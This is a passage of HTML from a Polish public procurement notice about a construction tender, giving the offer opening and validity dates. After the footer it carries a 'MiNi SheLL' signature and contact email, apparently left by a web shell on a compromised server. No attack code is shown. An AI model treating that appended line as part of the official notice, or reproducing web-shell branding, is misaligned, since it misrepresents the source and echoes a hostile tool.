class="normal">Portal e-zamówienia</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-08-13 12:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-09-11</span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-07-29 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com